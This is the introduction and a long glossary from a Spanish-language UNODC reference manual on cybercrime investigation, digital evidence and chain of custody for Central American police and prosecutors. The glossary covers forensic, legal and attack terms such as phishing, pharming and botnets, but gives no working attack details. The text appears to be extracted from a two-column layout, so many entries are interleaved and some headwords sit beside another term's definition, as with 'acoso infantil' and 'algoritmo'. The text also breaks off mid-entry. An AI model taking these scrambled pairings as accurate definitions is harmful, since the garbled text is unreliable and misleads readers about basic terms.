13.10.23 - Base Principal Del Manual

INTRODUCCIÓN
La Oficina de las Naciones Unidas Contra la Droga y el Delito -UNODC-, gracias

al apoyo de Canadá presenta este documento referencial. El cual es una
compilación del entendimiento de la ciberdelincuencia, tipologías del ciberdelito,
el entendimiento del trabajo de esta materia con enfoque victimo-criminológico,
que orienta a un trabajo de investigación de persecución penal estratégica,
donde se establece el perfil delincuencial y el abordaje de la cibercriminalidad,
respondiendo a los estándares internacionales a través de buenas prácticas,
directrices y marcos de referencia que da respuesta a la ausencia de marcos
regulatorios en la investigación de los ciberdelitos.
La ciberdelincuencia se diferencia de los delitos comunes en que «no tiene

barreras físicas o geográficas» y se puede cometer con menos esfuerzo y
más facilidad y velocidad que los delitos tradicionales. Dentro del marco del
proyecto “Fortalecimiento del sector seguridad y justicia de Centro América
para efectivamente prevenir, identificar y judicializar el cibercrimen, crimen
organizado transnacional y casos conexos a través de la evidencia digital:
Honduras, Guatemala, El Salvador y Belice” se priorizó generar una documentación
referencial para entender la investigación criminal y el fenómeno del ciberdelito,
innovando y estableciendo procesos metodológicos y científicos sobre el manejo
de la evidencia digital y cadena de custodia física, humana y digital; que facilite el
planteamiento de informes periciales y la garantía de la valoración de la prueba
ante los órganos judiciales.
Este esfuerzo responde y orienta con procesos en el análisis de dispositivos

digitales, uso de herramientas forenses, rutas de coordinación para el manejo
de la evidencia digital, conceptualización de la cibervíctima y ciberdelincuente,
fortaleciendo el trabajo que realiza el personal de la Policía y Ministerio Público, de
quienes investigan y encuadran el tipo penal.
El presente documento fue elaborado con participación del equipo de trabajo de

la UNODC, equipos multidisciplinarios de Policía, Ministerio Público e Instituciones
del Estados participantes especializadas en cibercrimen de Belice, Guatemala y
Honduras.
DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS 1

GLOSARIO
criptográficos que no poseen su propio
libro contable, como los tokens.
ALGORITMO:
ACOSO INFANTIL: En matemáticas e informática, se trata

de un conjunto de pasos y métodos
Cualquier forma de maltrato u que se construye (en números) para
hostigamiento físico, verbal o conseguir un resultado concreto o
psicológico que se produce entre niños solucionar un problema. En el mundo de
y jóvenes de forma reiterada a lo largo las criptomonedas, se usan algoritmos,
del tiempo. entre otras cosas, para verificar las
ACTA PERICIAL DE CAMPO: transacciones en la minería.
Extracción de la información a Equipos ANÁLISIS DE EVIDENCIA DIGITAL:

de comunicación terminales móviles, Etapa en la cual a través de scripts y de
tabletas, drones, GPS y tarjeta SIM que herramientas de software forense, se
se realiza fuera de las instalaciones del
logra recuperar, indexar, correlacionar,
laboratorio. reconstruir información y archivos
ACTIVOS VIRTUALES: del sistema, dando cumplimiento a
lo ordenado por la autoridad judicial
Representación digital de valor que competente.
se puede comercializar o transferir
digitalmente y se puede utilizar con ARCHIVO BORRADO:
fines de pago o inversión. Los activos Archivo que ha sido marcado por el
virtuales no incluyen representaciones sistema operativo como no visible para
digitales de monedas fiduciarias, el usuario.
valores y otros activos financieros que
ya están cubiertos en otras partes. ARCHIVO ELIMINADO:
ADQUISICIÓN: Archivo borrado que ha sido parcial o

totalmente sobrescrito por el sistema
Proceso de creación de una copia de operativo.
datos dentro de un conjunto definido.
ARCHIVO:
ADMISIBILIDAD:
Definido como archivo o fichero
Que puede ser aceptado, permitido o informático de agrupamiento de bits
tolerado. que son almacenados en un dispositivo
ALTCOIN: y que pueden ser usados por una
aplicación determinada.
Término empleado para referirse a las
criptomonedas alternativas a Bitcoin; ANTIVIRUS:
como Litecoin, Ethereum, Dash, Monero, Es un tipo de software que se utiliza para
Zcash, Bitcoin Cash, entre otras. También evitar, buscar, detectar y eliminar virus
puede hacer referencia a otros activos de una computadora.
2 DOCUMENTO REFERENCIAL PARA PROCEDIMIENTOS DE INVESTIGACIÓN DE CIBERDELITOS

ATAQUES DDOS: CABLE RJ45:
O ataques de denegación de servicio Es una interfaz física usada para conectar
distribuido. Tipo de ataque que redes de cableado estructurado este
aprovecha los límites de capacidad posee ocho pines.
específicos que se aplican a los recursos
CADENA DE CUSTODIA Y/O GARANTÍA
de red con el objetivo de hacer que
DE AUTENTICIDAD:
un sitio web o recurso de red no esté
disponible colapsándolo con tráfico Sistema que permite su trazabilidad
malintencionado para que no pueda para asegurar las características
funcionar correctamente. originales de las evidencias.
BLOCKCHAIN (CADENA DE BLOQUE): CAJEROS AUTOMÁTICOS:
Estructura digital organizada en O ATM (Automated Teller Machine) son
“bloques” (conjuntos) de datos dispositivos electrónicos que permiten
enlazados con criptografía que se realizar diversas transacciones y
añaden progresivamente uno tras trámites utilizando una tarjeta plástica
otro, creando una cadena. En las e introduciendo una clave, código o
criptomonedas, estos bloques registran número de autenticación personal
las transacciones válidas realizadas
CÁMARA DE CCTV:
con ellas. No siempre una blockchain es
descentralizada. Son aquellos dispositivos que captan la
imagen del lugar protegido. captura el
BLOQUEO CONTRA ESCRITURA:
vídeo y el audio (en caso de incorporar
Procedimiento que evita la escritura entrada y salida de audio) y puede ser
en un dispositivo magnético de fijas o PTZ.
almacenamiento.
CASA DE CAMBIO (EXCHANGE):
BOTNETS:
Es el lugar físico o digital donde se realizan
Un botnet no es un virus en sí mismo, operaciones de cambio de moneda.
sino es una colección de dispositivos Está organizado para intercambiar
automáticos conectados. Si estos han monedas entre un comprador y un
sido infectados con un malware, los vendedor, que puede ser la propia casa
cibercriminales pueden utilizarlos para de cambio, y se cobra una comisión por
obtener el control y distribuir programas su compra y por su venta. El precio de
nocivos. la divisa o criptomoneda se congela
durante el tiempo de la transacción.
CABLE COAXIAL:
LocalBitcoins es un ejemplo de casa de
Es un tipo de cable que se utiliza para cambio.
transmitir señales de electricidad de
CD DISCO COMPACTO:
alta frecuencia.
Disco óptico utilizado para almacenar
datos en formato digital según su

capacidad. un sistema informático sin autorización
sirviéndose de diferentes técnicas y
CENTRO DE CONSERVACIÓN DE
vulnerabilidades para la realización de
PRUEBAS:
actividades con fines maliciosos, como
Un entorno seguro o un lugar donde se el robo de información, extorsión del
almacenan las pruebas recogidas o propietario o simplemente daños al
adquiridas. sistema.
CERTIFICADO DE CUALIFICACIÓN CIBERBULLYING O CIBERACOSO:

PROFESIONAL:
Hostigamiento producido por una o un
Documento que constata que el menor hacia otra u otro menor, en forma
profesional ha sido instruido en la de insultos, vejaciones, amenazas,
materia objeto de la pericial, dispone de chantaje, etc., utilizando para ello un
la experiencia necesaria y ha sometido canal tecnológico.
conocimientos y experiencia ante los
CIBERDELINCUENCIA:
mandatos de los cuerpos de seguridad
pública o dirección de los laboratorios Es un acto que infringe la ley y que se
oficiales según sus procedimientos comete usando las tecnologías de la
internos. información y la comunicación (TIC)
para atacar las redes, sistemas, datos,
CERTIFICADO DIGITAL:
sitios web y la tecnología o para facilitar
Un certificado digital es un fichero un delito.
informático generado por una entidad
CIBERDELINCUENTE:
denominada Autoridad Certificadora
(CA) que asocia unos datos de Persona que realiza actividades
identidad a una persona física, delictivas en la red o utilizando la
organismo o empresa confirmando tecnología contra personas o sistemas
de esta manera su identidad digital informáticos, pudiendo provocar daños
en Internet. El certificado digital es económicos o reputacionales mediante
válido para autenticar la existencia y robo, filtrado de información, deterioro
validez de un usuario o sitio web por de software o hardware, fraude y por
lo que es necesaria la colaboración extorsión, entre otros.
de un tercero que sea de confianza
CIFRADO O CODIFICADO:
para cualquiera de las partes que
participe en la comunicación. El nombre Es el sistema mediante el cual, con
asociado a esta entidad de confianza la ayuda de técnicas diversas o
es Autoridad Certificadora pudiendo programas informáticos, se cifra o
ser un organismo público o empresa codifica determinada información con
reconocida en Internet. la finalidad de volverla inaccesible o
ininteligible.
CIBERATAQUE:
CLONAR:
Intento deliberado de un
ciberdelincuente de obtener acceso a Duplicar exactamente. La clonación

de tarjetas consiste en copiar la la integridad y/o el estado original de
información de tu tarjeta y colocarla las posibles pruebas digitales.
en otro plástico para hacer comprar,
COPIA DE PRUEBAS DIGITALES:
pagos o retiros de efectivo.
Copia de las pruebas digitales que se
CÓDIGO O REFERENCIA DE
hayan producido para mantener la
IDENTIFICACIÓN:
fiabilidad de las pruebas, incluyendo
Conjunto de caracteres alfanuméricos tanto las pruebas digitales como
que identificar un informen o dictamen los medios de verificación, cuando
pericial. el método para verificarlas pueda
estar integrado en las herramientas
COLECCIÓN:
utilizadas para realizar la verificación o
Proceso de recopilación de los elementos ser independiente de ellas.
físicos que contienen posibles pruebas
COPIA EVIDENCIA DIGITAL:
digitales.
Copia de la evidencia digital que ha
COMUNICACIÓN:
sido producido para mantener la
Es la acción y efecto de transmisión fiabilidad de las pruebas incluyendo
del pensamiento, mediante un código tanto la evidencia digital y medios
común mediante cualquier medio que de verificación, donde el método de
se utilice entre el emisor y receptor. verificar que puede ser embebido dentro
o independiente de las herramientas
COMUNICACIÓN PRIVADA: utilizadas en hacer la verificación.
Es la que se realiza entre emisor y CORREO SPAM:
receptor, revestida de privacidad y que
solamente interesa a los interlocutores Tipo de correo electrónico que se
o cuando se celebre dentro de un caracteriza por ser no solicitado por
ámbito estrictamente doméstico que el receptor y que se envía en grandes
no esté integrado o conectado a una cantidades con fines publicitarios o
red de difusión de cualquier tipo. como complemento de actividades
maliciosas como los ataques de
COMUNICACIÓN PÚBLICA: phishing.
Es todo acto por el cual una pluralidad CRIPTOMONEDAS:
de personas tiene acceso a la
comunicación sin previa autorización. No Activos nativos de plataformas
se considerará pública la comunicación basadas en técnicas criptográficas
cuando se celebre dentro de un ámbito y que se valen de una base de datos
estrictamente doméstico o privado que constituida bajo el sistema de cadena
no esté integrado o conectado a una de bloques. Ocurre que, como veremos
red de difusión de cualquier tipo. luego, algunos desarrollos les permiten
a sus usuarios desplegar sobre la
CONSERVACIÓN: cadena de bloques líneas de código
Proceso para mantener y salvaguardar informático y ejecutable, lo que da

lugar a la posibilidad de generar almacenado. En este sentido este acto
nuevas plataformas de criptoactivos afecta la confidencialidad, integridad
que funcionen sobre las anteriores. y/o disponibilidad de los datos y sistemas
informáticos. Asimismo, esta clase de
DATO DE PARTIDA:
actos existen dado que las tecnologías
Cualquier cantidad, magnitud, de la información y comunicación
características, relación, parámetro, existen. Ejemplos: hacking, ataques
criterio, hipótesis o requisito empleado distribuidos de denegación de servicio
en los documentos técnicos del informe y distribución de malware.
o dictamen pericial, externo a éstos
DELITOS CIBERFACILITADOS:
y cuyo conocimiento y aplicación es
necesario y obligatorio para el desarrollo Un acto que trasgrede la ley, el cual
del informe o dictamen pericial. requiere del uso de tecnologías de
la información y comunicación para
DATOS VOLÁTILES:
ser cometido. Dicho acto afecta seres
Datos especialmente propensos al humanos u otros bienes “no digitales”.
cambio y fácilmente modificables. En este sentido, las tecnologías de la
información y comunicación no se ven
DATOS PERSONALES: afectadas en esta clase de actos, aun
Información relativa a una persona cuando hayan sido empleadas para
física viva que puede ser identificada o su cometimiento. Asimismo, esta clase
identificable a través de la recopilación de actos existiría aún si no existiesen
de una serie de datos de carácter las tecnologías de la información y
personal, que establezcan de forma comunicación. Ejemplos: explotación y
directa o indirecta un perfil más o menos abuso sexual en línea, phishing (fraude
detallado de su identidad personal, y estafa en línea) y difusión en línea de
familiar o profesional. discurso de odio.
DECODIFICACIÓN: DERECHO DE AUTOR:
Es el proceso en el cual el receptor Incluye obras literarias tales como

transforma el código utilizado por las novelas, los poemas, y las obras
el emisor para interpretar los signos de teatro, películas, obras musicales,
empleados. De esta forma los signos obras artísticas, tales como los dibujos,
son asociados a las ideas que el emisor las pinturas, las fotografías y las
trató de comunicar. esculturas, y diseños arquitectónicos.
Los derechos conexos a los derechos
DELITOS CIBERDEPENDIENTES: de autor incluyen los derechos de los
Un acto que transgrede la ley, el cual artistas intérpretes y ejecutantes sobre
requiere del uso tecnologías de la sus interpretaciones o ejecuciones, los
información y comunicación para ser de los productores de fonogramas y
cometido. Dicho acto afecta programas los de los organismos de radio difusión
informáticos, plataformas virtuales o el respecto de sus programas de radio y
contenido digital creado, transmitido o televisión.

DICTAMEN PERICIAL: DONGLE:
Opinión técnica y experta que se emite Dispositivo de hardware externo (tipo
sobre hechos o cosas pendrive) o licencia digital que se
conecta a un computador el cual
DIGITAL EVIDENCE FIRST RESPONDER-
contiene código de licenciamiento para
DEFR (PRIMER RESPONDIENTE DE
autenticar una pieza de software.
EVIDENCIA DIGITAL):
DRONE/VANT:
Persona autorizada, formada y
cualificada para actuar en primer lugar Son aparatos voladores que incorporan
en el lugar del incidente en la recogida tecnología avanzada que permite
y adquisición de pruebas digitales con estabilizarse y volar por sí solos mediante
la responsabilidad de manipular dichas GPS.
pruebas.
DVD disco versátil digital:
DISCO DURO:
Similar en apariencia a un disco
Es el dispositivo de almacenamiento compacto, que almacena grandes
de datos que emplea un sistema de cantidades de datos.
grabación magnética para almacenar
ELEMENTO MATERIAL PROBATORIO
archivos digitales.
(EMP):
DISPOSITIVO DE ALMACENAMIENTO DE
Elementos físicos, digital que son
INFORMACIÓN:
recolectados por los investigadores
Unidad de disco que permite almacenar como consecuencia de un acto en
datos en forma temporal o permanente. investigación los cuales pueden servir
en la etapa de juicio para demostrar la
DISPOSITIVO DIGITAL:
teoría del caso que se expone ante el
Equipo electrónico utilizado para juez es cierta.
procesar o almacenar datos digitales.
ELEMENTO DE PRUEBA (EP):
DOCUMENTO ELECTRÓNICO:
Es la evidencia que se introduce
Todo contenido originalmente creado como prueba en un proceso judicial,
desde una aplicación electrónica y posterior a ser aceptada a través de la
que contiene información para facilitar preposición de pruebas.
transacciones o compartir información
EMBALAJE:
entre las partes.
Procedimiento técnico utilizado para
DOCUMENTOSCOPÍA:
preservar y proteger los elementos
Técnica que trata de establecer de prueba, evidencias o indicios
mediante metodología propia, la en el empaque adecuado con el
autenticidad de escritos, documentos fin de ser enviados para análisis o
y determinar cuando sea posible, la almacenamiento.
identidad de sus autores.

ESPACIO ASIGNADO: como prueba en un proceso judicial.
Zona de un soporte digital, incluida EXPERTO CERTIFICADO:
la memoria primaria, que se utiliza
Profesional titulado que ha sido instruido
para almacenar datos, incluidos los
en la materia objeto de la pericial,
metadatos.
dispone de la experiencia necesaria.
ESPACIO SIN ASIGNAR:
EXPLOTACIÓN SEXUAL INFANTIL:
Zona en los medios digitales, incluyendo
Una niña, niño o un adolescente es
la memoria digital, que no ha sido
víctima de explotación sexual cuando
asignado por el sistema operativo y que
participa en esa actividad sexual a
está disponible para el almacenamiento
cambio de algo (por ejemplo, ganancia
de datos, incluido los metadatos.
o beneficio, o incluso la promesa de
ESPECIALISTA EN PRUEBAS DIGITALES tales) recibida por una tercera persona,
(DES): el agresor, o incluso la propia niña, niño
o adolescente. Una niña, un niño o un
Persona capaz de desempeñar las
adolescente puede ser obligado a
tareas de un DEFR y con conocimientos
una situación de explotación sexual a
especializados, aptitudes y capacidades
través de la fuerza física o amenazas.
para tratar una amplia gama de
Sin embargo, también puede ser
cuestiones técnicas.
persuadido a participar en ese tipo de
ETAPA ADMINISTRATIVA: actividades sexuales como resultado de
factores más complejos y con matices,
Es aquella en que las actuaciones de ya sean humanos o situacionales,
investigación se desarrollan o realizan incluyendo un desequilibrio de poder
cuando el proceso no se ha judicializado. entre la víctima y el agresor.
ETAPA JUDICIAL: EXPOLIACIÓN:
Comprende las actuaciones de Acto de realizar o permitir cambios
investigación cuando el caso ha sido en las posibles pruebas digitales que
judicializado a través de la presentación disminuyan su valor probatorio.
de requerimiento fiscal.
EXTRACCIÓN FÍSICA:
EVIDENCIA (EV):
Procedimiento por el cual se realiza de
Es todo indicio que demuestre un hecho manera forense la extracción completa
o circunstancia relacionada con el de datos bit a bit de la información
delito objeto de investigación a través contenida en la memoria flash del EMP.
de su análisis.
EXTRACCIÓN LÓGICA:
EVIDENCIA DIGITAL:
Procedimiento por el cual se adquiere
Es un registro de la información de manera forense la menor cantidad
guardada o difundida a través de un de datos contenidos en los EMP y que
sistema informático que puede utilizarse son visibles por el sistema operativo en

la memoria flash del mismo. horizontales que dan cuenta de la
resolución vertical, mientras que la
EXTRACCIÓN MANUAL:
letra p se refiere a progressive scan,
Procedimiento por medio del cual en contraposición a la exploración
se obtiene la información contenida entrelazada.
en equipo terminal móvil utilizando
FUNCIÓN DE VERIFICACIÓN:
hardware, software forense y/o
dispositivos de captura digital. Que se utiliza para verificar que dos
conjuntos de datos son idénticos.
EXTRACCIÓN DE SISTEMA DE ARCHIVOS:
GARANTÍA DE AUTENTICIDAD:
Procedimiento por el cual se realiza de
manera forense la extracción de datos Procedimientos transparentes y
lógicos contenida en memoria flash debidamente documentados, a los que
del EMP más los archivos ocultos del se sujeta un indicio localizado en un sitio
sistema operativo. de un suceso criminal o relacionado con
éste, mientras transita por diferentes
FIABILIDAD:
momentos, lugares y condiciones, hasta
Propiedad del comportamiento y los ser presentado legítimamente como
resultados previstos coherente. prueba en un juicio oral.
FIJAR:
Actividad que realiza el perito de GESTIÓN DE INCIDENTES:
informática forense a través de la
Listado de procedimientos previamente
utilización de medios de fijación con
documentados sobre los pasos a seguir
el objetivo de volver inalterable una
en caso de detectar una amenaza
imagen, como forma de perpetuar con
de ciberseguridad en la empresa. La
exactitud el lugar de los hechos y los
gestión de incidentes está orientada a
EMP relacionados con este.
mitigar en el menor tiempo posible un
FIRMA DIGITAL: incidente de seguridad identificándolo
y asignando el personal que dará
Conjunto de datos asociados a un respuesta al mismo dentro de unos
mensaje que permite asegurar la parámetros predefinidos.
identidad del firmante y la integridad
del mensaje. HACKING:
FORENSE: Es un acto que permite el acceso de

una persona o hacker a un sistema
Es el que ejerce su función por informático o red sin la autorización
delegación judicial o legal. del propietario aprovechando su
FULL HD: mayor conocimiento y comprensión
de la computadora y de los sistemas
Es un tipo de resolución usada en la informáticos para conocer un delito de
televisión de alta definición (HDTV). El piratería informática.
número 1080p representa 1080 líneas

HARDWARE: HOJA DE GARANTÍA DE AUTENTICIDAD:
Conjunto de elementos físicos o Documento que lleva el control del
materiales que constituyen una traspaso y traslado del elemento de
computadora o un sistema informático. prueba, evidencia o indicios durante el
desarrollo del proceso de cadena de
HD:
custodia. Permite verificar la identidad,
(High Definition), es el nombre corto el estado y condiciones originales de los
para una de las categorías de los elementos físicos de prueba, así como
modos de vídeo, usado principalmente las modificaciones realizadas a estos,
en la televisión de alta definición (HDTV establece la ruta seguida por dichos
- High Definition televisión). El número elementos; determina su lugar de
720 representa 720 líneas horizontales permanencia y la persona responsable
de resolución de pantalla, mientras que de la custodia en cada lapso del tiempo
la letra p significa barrido progresivo hasta ser presentado.
HDMI: HORA DEL SISTEMA:
(High Definition Multimedia Interface) Tiempo generado por el reloj del sistema
interfaz multimedia de alta definición: y utilizado por el sistema operativo,
hace referencia a la norma de conexión no el tiempo calculado por el sistema
que permite transmitir audio y vídeo sin operativo.
comprimir desde un equipo a otro y con
ICCID:
un único cable, incluido el contenido en
alta definición. Identificador de la Tarjeta del Circuito
Integrado es un número gravado en la
HERRAMIENTA DE EXTRACCIÓN:
SIM de un teléfono.
Dispositivo forense compuesto por
IDENTIFICACIÓN:
hardware o software que permite
la adquisición de la información de Proceso de búsqueda, reconocimiento
manera forense. y documentación de posibles pruebas
digitales.
HIBERFIL.SYS:
INCIDENTE DE SEGURIDAD:
Es un archivo temporal creado para
almacenar el estado de la memoria Cualquier suceso que afecte a
RAM antes de entrar en estado de la confidencialidad, integridad o
hibernación. disponibilidad de los activos de
información, por ejemplo: acceso o
HOJA DE EMBALAJE:
intento de acceso a los sistemas, uso,
Formato diligenciado que se adhiere al divulgación, modificación o destrucción
embalaje con fines de identificación de no autorizada de información.
los elementos de prueba, evidencias o
IMÁGENES:
indicios.
Proceso de creación de una copia bit a

bit de un soporte de almacenamiento INTERVENCIÓN DE LAS
digital. COMUNICACIONES:
IMAGEN FORENSE: Es una técnica especial de investigación,
que consiste en el procedimiento a través
Copia exacta (bit a bit) de la información
del cual, se escucha, capta, registra,
contenida en un dispositivo de
guarda, graba u observa, por parte
almacenamiento digital.
de la autoridad, sin el consentimiento
INDICIOS (ID): de sus titulares o participantes, una
comunicación que se efectúa, mediante
Es todo objeto, instrumento, huella, cualquier tipo de transmisión, emisión o
marca, rastro, señal o vestigio que se recepción de signos, símbolos, señales
usa, se produce respectivamente en la escritas, imágenes, sonidos, correos
ejecución de un hecho y que se ubica electrónicos o información de cualquier
en un lugar de los hechos o escena del naturaleza por hilo, radio-electricidad,
delito. medios ópticos u otros medios,
INFORMÁTICA FORENSE: sistemas electromagnéticos, telefonía,
radio-comunicación, telegrafía,
Disciplina de las ciencias forenses medios informáticos o telemáticos, o
que, considerando las tareas propias de naturaleza similar o análogo, así
asociadas con la evidencia, procura como la comunicación que se efectúe
descubrir e interpretar la información en a través de cualquier medio o tipo de
los medios Informáticos para establecer transmisión.
los hechos y formular las hipótesis
relacionadas con el caso. Entendiendo INSTRUMENTO DE SOPORTE:
los elementos propios de la tecnología Es el medio utilizado para la transmisión,
de los equipos de computación ofrece emisión, recepción o almacenamiento
un análisis de la información residente de cualquier tipo de comunicación.
en dichos equipos.
INVESTIGACIÓN CRIMINAL:
INFORME INVESTIGADOR DE
LABORATORIO: Función que cumplen algunos
funcionarios del estado para apoyar
Informe pericial donde se narran la investigación penal en el campo
los procedimientos realizados a los investigativo, técnico, científico y
elementos de prueba en el laboratorio, operativo, por iniciativa propia o por
evidencias o indicios, para finalmente orden impartida por el fiscal de la
dar una interpretación o resultado. investigación, para recaudar los EP,
INFORME PERICIAL DE CAMPO: EV o ID que permitan determinar la
ocurrencia de la conducta punible y
Informe pericial donde se narran la responsabilidad de los autores o
los procedimientos realizados a los participantes.
elementos de prueba en el campo,
evidencias o indicios, para finalmente
dar una interpretación o resultado.

LUGAR O ESPACIO PÚBLICO: y obtener información sensible, como
credenciales de acceso, información
Deberá interpretarse que incluye
financiera, etc. O para suplantar la
aquellos en los que el investigado
identidad de alguna de las partes.
no puede ejercer su derecho a la
intimidad, donde no pueda reservar al MARCA DE TIEMPO:
conocimiento de los demás lo que está
Parámetro variable en el tiempo que
sucediendo al no disponer de ningún
denota un punto en el tiempo con
derecho de exclusión sobre ese lugar.
respecto a una referencia de tiempo
Se contrapone este concepto al de
común.
lugares privados, que serán aquellos,
como el domicilio, el vestuario de un MEDIO DE ALMACENAMIENTO DIGITAL:
gimnasio, el cambiador de una tienda
o un cuarto de baño, donde el individuo Dispositivo en el que se pueden grabar
puede limitar el acceso de terceros, datos digitales.
ejerciendo de ese modo ámbitos de MEMORIA EXTERNA:
privacidad excluidos del conocimiento
ajeno. Dispositivo de almacenamiento
digital que aumenta la capacidad del
MALWARE: dispositivo (micro SD, pendrive, Mini SD,
También llamado “Malicius entre otros).
software” o programas malignos o MIXER:
malintencionados, se refiere a cualquier
software que tiene como objetivo Es un servicio o protocolo que divide
filtrarse en una computadora sin el los montos a enviar por los usuarios en
consentimiento del usuario con fines cantidades pequeñas que van pasando
destructivas. El malware incluye a los por distintas direcciones antes de
virus, troyanos, gusanos y spyware. unificarse de nuevo en el destino final.
Esta operación dificulta el rastreo de
MANIPULACIÓN: capitales.
Acto de hacer deliberadamente o MP3:
permitir el cambio(s) de la evidencia
digital (es decir, la intención o la MPEG Audio Layer 3, es un formato
expoliación propósito). de audio común usado para música
tanto en computadoras como en
MAN IN THE MIDDLE: reproductores de audio portátil.
Tipo de ataque destinado a interceptar, MUESTRA:
sin autorización, la comunicación entre
dos dispositivos conectados a una red. Porción de un material a analizar.
Este ataque le permite a un agente NÚMERO DE AUTENTICACIÓN PERSONAL
malintencionado manipular el tráfico o PIN:
interceptado de diferentes formas, ya
sea para escuchar la comunicación (Personal Identification Number), es
una clave de seguridad para evitar que

cualquier persona pueda hacer un uso garanticas jurídicas.
fraudulento de tu tarjeta.
PHARMING:
PAGEFILE.SYS:
Ataque informático que aprovecha
Es uno de los esquemas de gestión una vulnerabilidad del software de
de memoria mediante la cual una los servidores DNS y que consiste en
computadora almacena y recupera modificar o sustituir el archivo del
datos desde el almacenamiento servidor de nombres de dominio
secundario para su uso en la memoria cambiando la dirección IP legítima
principal. de una entidad (comúnmente una
entidad bancaria) de manera que en el
PALABRA CLAVE:
momento en el que el usuario escribe
Secuencia de caracteres empleados el nombre de dominio de la entidad en
para la búsqueda especifica de la barra de direcciones, el navegador
información. redirigirá automáticamente al usuario
a una dirección IP donde se aloja una
PERIFÉRICOS: web falsa que suplantará la identidad
Dispositivo conectado a un aparato legítima de la entidad, obteniéndose de
digital para ampliar su funcionalidad. forma ilícita las claves de acceso de los
clientes la entidad.
PERICIA:
PHISHING:
Es la habilidad, sabiduría y experiencia en
una materia. Es la capacidad de realizar Es uno de los ataques de ingeniería
informes con complejidad técnica, social más utilizados en todo el mundo
fuera del alcance del ciudadano medio. por los ciberdelincuentes para engañar
a los usuarios y así obtener información
PERITO: sensible, privada y personal, sobre todo
Es la persona que posee conocimientos, datos bancarios.
técnicos, científicos, artísticos o PÍXEL:
prácticos y al cual se acude en busca
de un dictamen, para que como asesor La palabra píxel proviene de la unión
facilite al juzgador, los conocimientos de las palabras inglesas picture y
que sean necesarios o convenientes element (elemento de imagen). Un
para una mejor apreciación de los píxel es la menor unidad de color que
hechos controvertidos. conforma una imagen digital, ya sea
una fotografía, video o fotograma.
PERITO INFORMÁTICO:
POLÍTICA DE PRIVACIDAD:
Es una persona especializada en la
informática y en tecnologías de la Hace referencia a un documento que
información y comunicación capaz de contiene los procedimientos y prácticas
extraer, analizar y presentar mediante adoptados en una página, con el fin
un informe pericial la información de de brindarle confianza al usuario con
una evidencia digital con todas las respecto al manejo de sus datos.

PRESERVACIÓN: sobre ideas y conceptos, que son de
importancia debido a su aplicabilidad
Proceso de mantener y salvaguardar la
tanto en la industria como en el
integridad y / o el estado original de la
comercio, que trata principalmente de
evidencia digital potencial.
la protección de las nuevas creaciones
PRESTADORES DE SERVICIOS DE (patentes de invención, modelos de
COMUNICACIONES U OPERADOR utilidad, diseños industriales y circuitos
DE REDES COMERCIALES DE integrados); los signos distintivos
COMUNICACIONES: (marcas, nombre comercial, enseña y
denominaciones de origen); y el secreto
Persona natural o jurídica que ofrece empresarial.
uno o más servicios comerciales de
comunicaciones, venta de aparatos de PROPIEDAD INTELECTUAL:
comunicación, memorias, accesorios u
Es aquel derecho que busca la
otros, ya sea directa o indirectamente
protección de una obra o creación
a través de otras personas naturales o
de carácter innovador y se divide en
jurídicas.
dos categorías, que son los derechos
PRINCIPIO DE DISPONIBILIDAD: de autor y propiedad industrial como
hemos visto al inicio de la presente
Cuando la información es accesible a página.
los usuarios autorizados en el momento
de requerirla. PRUEBA ELECTRÓNICA:
PRINCIPIO DE INTEGRIDAD: Es la obtenida a partir de un dispositivo

electrónico o medio digital que sirve
Cuando se garantiza que la información para formar la convicción en torno
es exacta y completa, no se modifica a una afirmación o punto de debate
desde el momento de su creación y se relevante en un procedimiento judicial.
almacena en un formato que asegura Por ejemplo, una fotografía, un video, un
la exactitud de la información original. sms, una conversación por whatsapp,
PRINCIPIO DE NO REPUDIO: una página web, un e-mail, una base
datos, en cualquier soporte constituye
Cuando la información involucrada una prueba electrónica. El componente
en un evento corresponde a quien electrónico de la prueba electrónica
participa en el mismo, quien no podrá hace que sea especialmente importante
desconocer su intervención en dicho presentarla ante los Tribunales de
evento. forma clara y comprensible para
PRINCIPIO DE OBSERVANCIA: que personas sin conocimientos TIC
puedan comprenderla. Por eso en
Cuando se lleva el registro de los ocasiones será conveniente contar con
eventos importantes. un asesoramiento tecnológico o con un
PROPIEDAD INDUSTRIAL: peritaje en seguridad informática. En
ocasiones la víctima destruye la propia
consiste en un conjunto de derechos prueba electrónica, pero con el uso

de determinadas técnicas puede ser REPETIBILIDAD:
recuperada.
Propiedad de un proceso realizado
PRUEBAS DIGITALES: para obtener los mismos resultados de
prueba en el mismo entorno de prueba
Información o datos almacenados
(misma computadora, disco duro,
o transmitidos en forma binaria que
modo de funcionamiento, etc.
puedan utilizarse como prueba.
REPETITIVIDAD:
RANSOMWARE:
Habilidad de un aparato o procedimiento
Es un tipo de malware que impide a los
para realizar la misma acción en
usuarios acceder a su sistema o a sus
forma consistente o proporcionar la
archivos personales y que exige el pago
misma información bajo las mismas
de un rescate para poder acceder de
condiciones en un laboratorio dado.
nuevo a ellos.
REPRODUCIBILIDAD:
RECOLECTAR:
Propiedad de un proceso para obtener
Recoger uno o varios elementos en
los mismos resultados de las pruebas
la escena del delito o en el lugar de
en un entorno de pruebas diferente
los hechos materia de investigación
(computadora, disco duro, operador,
conservando los procedimientos de
etc.)
buena recolección y preservación de la
evidencia o indicios.
RECOLECCIÓN: RESOLUCIÓN DE PANTALLA:
Proceso de reunir los elementos Es el número de píxeles que puede ser
físicos que contienen evidencia digital mostrado en la pantalla, viene dada
potencial. por el producto del ancho por el alto,
medidos ambos en píxeles, con lo que se
RED:
obtiene una relación, llamada relación
Conjunto de equipos conectados por de aspecto Depende del monitor.
medio de cables, señales, ondas o
RGB:
cualquier otro método de transporte
de datos, que comparten información Es un modelo de color basado en la
(archivos), recursos (CD-ROM, síntesis aditiva, con el que es posible
impresoras, etc.) representar un color mediante la
mezcla por adición de los tres colores
RELACIÓN DE ASPECTO:
de luz primarios. Los monitores de las
De una imagen, es la proporción computadoras apelan a la síntesis
entre su ancho y su altura. Se calcula aditiva de color para la representación
dividiendo el ancho por la altura de la de los colores.
imagen visible en pantalla, y se expresa
SALAMI TECHNIQUE:
normalmente como «X:Y».
Técnica donde el delincuente

transfiere repetidamente cantidades SPOOFING:
inapreciables de dinero de una cuenta
Es una técnica de suplantación de
a otra. De esta manera, el titular de la
identidad en la Red, llevada a cabo
cuenta no percibe que le estén quitando
por un ciberdelincuente generalmente
dinero a corto plazo.
gracias a un proceso de investigación
SEXTING: o con el uso de malware. Los ataques
de seguridad en las redes usando
Intercambio, difusión o publicación de
técnicas de spoofing ponen en riesgo la
fotografías y vídeos de carácter sexual,
